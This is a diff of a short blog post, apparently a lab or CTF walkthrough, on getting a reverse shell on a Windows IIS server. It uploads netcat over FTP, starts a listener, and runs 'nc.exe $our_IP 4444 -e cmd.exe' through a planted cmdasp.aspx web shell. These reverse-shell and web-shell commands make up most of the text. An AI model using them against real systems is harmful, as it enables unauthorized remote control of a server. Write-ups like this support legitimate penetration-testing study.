muzzman96/muzzman96.github.io/_posts/2021-02-02-third-post.md

 We can upload netcat **(nc.exe)**, set up our listener and get a callback.
 This can be done as follows:

 1. copy nc.exe to local dir:
--cp /usr/share/windows-resources/binaries/nc.exe:
+- cp /usr/share/windows-resources/binaries/nc.exe:

 2. upload nc.exe to server via FTP
--ftp put nc.exe
+- ftp put nc.exe

 3. setup our local machine listener for the call back:
--nc -nlvp 4444
+- nc -nlvp 4444

-4. go to $IP/cmdasp.aspx in the browser and find where is located -dir "\cmdasp.aspx" /s
+4. go to $IP/cmdasp.aspx in the browser and find where is located
+- dir "\cmdasp.aspx" /s

-5. run nc.exe in browser to initate call back -c:\inetpub\wwwroot\nc.exe $our_IP 4444 -e cmd.exe
+5. run nc.exe in browser to initate call back
+- c:\inetpub\wwwroot\nc.exe $our_IP 4444 -e cmd.exe

 ![2021-02-02 16_49_45-Window.png](/images/2021-02-02 16_49_45-Window.png)